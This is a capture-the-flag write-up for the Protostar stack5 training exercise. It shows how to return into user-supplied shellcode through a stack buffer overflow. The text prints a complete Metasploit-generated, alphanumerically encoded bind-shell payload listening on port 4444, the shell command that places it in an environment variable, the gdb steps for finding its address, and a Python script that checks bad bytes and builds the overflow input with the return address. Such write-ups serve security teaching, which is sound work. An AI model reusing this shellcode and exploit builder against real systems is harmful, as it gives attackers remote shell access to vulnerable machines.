Protostar Exploit Challenges Stack5 Solution

Introduction

There really isn't anything to this one. It is exactly the same overflow as the last challenge, except that instead of returning into an existing function you return into shellcode you supply yourself.

Generating Shellcode

I just used Kali Linux to generate my shellcode. In this case it is a bind shell that listens on port 4444. To get to it, log in to Kali, start Metasploit with the command msfconsole, and then type use payload/linux/x86/shell_bind_tcp. From there run generate -s 20 -e x86/alpha_mixed (the command shown below). The -s 20 says that I want a NOP sled 20 bytes long; the output notes it was built by the x86/opty2 generator. The -e x86/alpha_mixed selects the alphanumeric encoder, so the encoded body comes out as printable characters. Note that only the encoded body is printable: the NOP sled and the short FPU/fnstenv getpc stub in front of the decoder are still raw bytes. generate also accepts -b '\x00\x0A\x0D' to keep those bytes out of the sled and the payload; it was not used for the output below, which is why that sled contains a 0x00 byte (the seventh byte of buf). A 0x00 cannot survive into an environment string, so if you want the sled intact, pass -b.

msf payload(shell_bind_tcp) > generate -s 20 -e x86/alpha_mixed
# linux/x86/shell_bind_tcp - 236 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# NOP gen: x86/opty2
# VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependSetresgid=false,
# PrependSetregid=false, PrependSetgid=false,
# PrependChrootBreak=false, AppendExit=false,
# InitialAutoRunScript=, AutoRunScript=
buf =
"\xd4\x4f\x39\xf9\xa8\x90\x00\xf5\x37\x4e\x48\x98\x49\x10" +
"\xfd\x04\x24\x91\x9f\x46\xda\xc8\xd9\x74\x24\xf4\x59\x49" +
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43" +
"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" +
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +
"\x58\x50\x38\x41\x42\x75\x4a\x49\x55\x61\x69\x4b\x79\x67" +
"\x48\x63\x36\x33\x32\x63\x43\x63\x73\x5a\x53\x32\x4e\x69" +
"\x39\x71\x58\x30\x32\x46\x58\x4d\x6d\x50\x33\x6b\x51\x4e" +
"\x42\x72\x35\x38\x65\x52\x67\x70\x34\x51\x43\x6c\x50\x6a" +
"\x36\x70\x62\x71\x70\x50\x4f\x79\x58\x61\x70\x6a\x61\x76" +
"\x46\x38\x38\x4d\x4f\x70\x4b\x39\x51\x51\x73\x34\x6c\x73" +
"\x37\x74\x48\x30\x42\x46\x48\x4d\x4b\x30\x57\x33\x78\x30" +
"\x71\x76\x7a\x6d\x6f\x70\x4e\x73\x43\x69\x72\x4a\x45\x6f" +
"\x30\x58\x78\x4d\x4d\x50\x72\x69\x71\x69\x4b\x48\x65\x38" +
"\x44\x6f\x34\x6f\x51\x63\x75\x38\x72\x48\x34\x6f\x33\x52" +
"\x35\x39\x52\x4e\x4d\x59\x48\x63\x52\x70\x42\x73\x6d\x59" +
"\x48\x61\x58\x30\x44\x4b\x58\x4d\x6d\x50\x41\x41"

Exploitation

We just need to change the target address from the last challenge to the address of our shellcode, which I placed in an environment variable. It is prefixed with 30 NOP bytes (0x90) so the return address only has to land somewhere in the sled rather than on the exact first byte.

user@protostar:/opt/protostar/bin$ export SHELLCODE=$(python -c 'print "\x90"*30 + "\xd4\x4f\x39\xf9\xa8\x90\x00\xf5\x37\x4e\x48\x98\x49\x10\xfd\x04\x24\x91\x9f\x46\xda\xc8\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x55\x61\x69\x4b\x79\x67\x48\x63\x36\x33\x32\x63\x43\x63\x73\x5a\x53\x32\x4e\x69\x39\x71\x58\x30\x32\x46\x58\x4d\x6d\x50\x33\x6b\x51\x4e\x42\x72\x35\x38\x65\x52\x67\x70\x34\x51\x43\x6c\x50\x6a\x36\x70\x62\x71\x70\x50\x4f\x79\x58\x61\x70\x6a\x61\x76\x46\x38\x38\x4d\x4f\x70\x4b\x39\x51\x51\x73\x34\x6c\x73\x37\x74\x48\x30\x42\x46\x48\x4d\x4b\x30\x57\x33\x78\x30\x71\x76\x7a\x6d\x6f\x70\x4e\x73\x43\x69\x72\x4a\x45\x6f\x30\x58\x78\x4d\x4d\x50\x72\x69\x71\x69\x4b\x48\x65\x38\x44\x6f\x34\x6f\x51\x63\x75\x38\x72\x48\x34\x6f\x33\x52\x35\x39\x52\x4e\x4d\x59\x48\x63\x52\x70\x42\x73\x6d\x59\x48\x61\x58\x30\x44\x4b\x58\x4d\x6d\x50\x41\x41"')
user@protostar:/opt/protostar/bin$ echo $SHELLCODE
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒O9▒▒7NH▒I▒$▒▒F▒▒▒t$▒YIIIIIIIIIICCCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIUaiKygHc632cCcsZS2Ni9qX02FXMmP3kQNBr58eRgp4QClPj6pbqpPOyXapjavF88MOpK9QQs4ls7tH0BFHMK0W3x0qvzmopNsCirJEo0XxMMPriqiKHe8Do4oQcu8rH4o3R59RNMYHcRpBsmYHaX0DKXMmPAA

Now we have to find the shellcode on the stack. I used the guess and check method: I placed a breakpoint on main and then looked for the environment variable. I found it with x/60s $esp+0x200. I used +0x200 because the environment strings sit near the top of the stack, at higher addresses than main's frame, so the variable has to be somewhere above $esp. My shellcode was at address 0xbffffece. Keep in mind that this address only holds for a run with the same environment and program path: gdb adds variables such as LINES and COLUMNS and starts the binary by its full path, so the stack shifts if you later run the program outside gdb. Now all we do is plug in that value for the return address and away we go:

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack5 < ~/input_file

VICTORY
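The two checks a practitioner wants before repeating the steps above are whether the generated bytes can actually be delivered (the Generating Shellcode section's point about -b) and whether the input file is built correctly (the Exploitation section). The Python 3 script below is an added example, not code from the original post or from Metasploit: it embeds the 236-byte generate output shown above, reports the bytes that -b '\x00\x0A\x0D' would have rejected, measures how much of the alpha_mixed output is really alphanumeric, reproduces what ends up in the SHELLCODE environment variable, and builds input_file for the gdb run. RET_ADDR is the 0xbffffece the post found in gdb; EIP_OFFSET is an assumption (the saved-EIP offset carried over from the stack4 write-up, which this post does not restate), as is the file name input_file.

```python
"""Checks and builders for the stack5 exploit described above.

Added example, not code from the original post. SHELLCODE is the 236-byte
generate output shown in the post. RET_ADDR is the address the post found in
gdb; EIP_OFFSET is assumed (the stack4 offset the post reuses without
restating it).
"""
import struct

# The generate output from above, copied byte for byte: a 20-byte opty2 sled,
# the alpha_mixed getpc stub and decoder, then the encoded shell_bind_tcp.
SHELLCODE = (
    b"\xd4\x4f\x39\xf9\xa8\x90\x00\xf5\x37\x4e\x48\x98\x49\x10"
    b"\xfd\x04\x24\x91\x9f\x46\xda\xc8\xd9\x74\x24\xf4\x59\x49"
    b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43"
    b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
    b"\x58\x50\x38\x41\x42\x75\x4a\x49\x55\x61\x69\x4b\x79\x67"
    b"\x48\x63\x36\x33\x32\x63\x43\x63\x73\x5a\x53\x32\x4e\x69"
    b"\x39\x71\x58\x30\x32\x46\x58\x4d\x6d\x50\x33\x6b\x51\x4e"
    b"\x42\x72\x35\x38\x65\x52\x67\x70\x34\x51\x43\x6c\x50\x6a"
    b"\x36\x70\x62\x71\x70\x50\x4f\x79\x58\x61\x70\x6a\x61\x76"
    b"\x46\x38\x38\x4d\x4f\x70\x4b\x39\x51\x51\x73\x34\x6c\x73"
    b"\x37\x74\x48\x30\x42\x46\x48\x4d\x4b\x30\x57\x33\x78\x30"
    b"\x71\x76\x7a\x6d\x6f\x70\x4e\x73\x43\x69\x72\x4a\x45\x6f"
    b"\x30\x58\x78\x4d\x4d\x50\x72\x69\x71\x69\x4b\x48\x65\x38"
    b"\x44\x6f\x34\x6f\x51\x63\x75\x38\x72\x48\x34\x6f\x33\x52"
    b"\x35\x39\x52\x4e\x4d\x59\x48\x63\x52\x70\x42\x73\x6d\x59"
    b"\x48\x61\x58\x30\x44\x4b\x58\x4d\x6d\x50\x41\x41"
)

RET_ADDR = 0xbffffece   # where gdb showed the sled (from the post)
EIP_OFFSET = 76         # assumption: offset to the saved EIP, reused from stack4
NOP_SLED_LEN = 30       # the "\x90"*30 prefix the post puts in the env var

# Bytes that cannot be delivered: environment strings are C strings, so a NUL
# can never be part of one (bash drops it during command substitution), and
# gets() stops at 0x0a, so the return address in input_file must avoid it.
BAD_BYTES = b"\x00\x0a\x0d"


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Return [(offset, value), ...] for every byte of payload that is in bad.
    This is the filtering generate's -b option would have done at the source."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def non_alnum_prefix_len(payload):
    """Length of the leading run that is not plain ASCII alphanumeric.

    alpha_mixed only makes the encoded body alphanumeric; the NOP sled and the
    FPU/fnstenv getpc stub in front of the decoder are raw bytes. bytes.isalnum
    is ASCII-only, which is exactly the test we want."""
    last = -1
    for i, b in enumerate(payload):
        if not bytes([b]).isalnum():
            last = i
    return last + 1


def env_payload(shellcode=SHELLCODE, sled_len=NOP_SLED_LEN):
    """What actually lands in the SHELLCODE environment variable: the 0x90 sled,
    then the payload with NUL bytes removed, mirroring the $(...) step above."""
    return b"\x90" * sled_len + shellcode.replace(b"\x00", b"")


def survives_gets(data):
    """True if gets() would read every byte of data (no newline inside it)."""
    return b"\n" not in data


def build_input(ret_addr=RET_ADDR, eip_offset=EIP_OFFSET):
    """Padding up to the saved return address, then ret_addr little-endian.
    Raises if the packed address contains 0x0a, which gets() would stop at."""
    packed = struct.pack("<I", ret_addr)
    if not survives_gets(packed):
        raise ValueError("return address %#x contains 0x0a" % ret_addr)
    return b"A" * eip_offset + packed


if __name__ == "__main__":
    print("payload length:", len(SHELLCODE))
    print("bad bytes (offset, value):", find_bad_bytes(SHELLCODE))
    print("non-alphanumeric prefix:", non_alnum_prefix_len(SHELLCODE), "bytes")
    print("env var length after NUL removal:", len(env_payload()))
    data = build_input()
    with open("input_file", "wb") as f:       # assumed file name, fed via < input_file
        f.write(data + b"\n")
    print("wrote input_file:", data.hex())
```

Run on a workstation with Python 3 (the Protostar VM itself only ships Python 2). The bad-byte report shows the single 0x00 inside the opty2 sled and nothing in the encoded body, which is why the exploit still worked: bash silently dropped that byte and the 30 plain NOPs in front absorbed the damage, but regenerating with -b is the reliable fix. The prefix measurement shows that the first 26 bytes of the "alphanumeric" payload are not alphanumeric at all, so any filter that only admits printable input would still reject this output.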
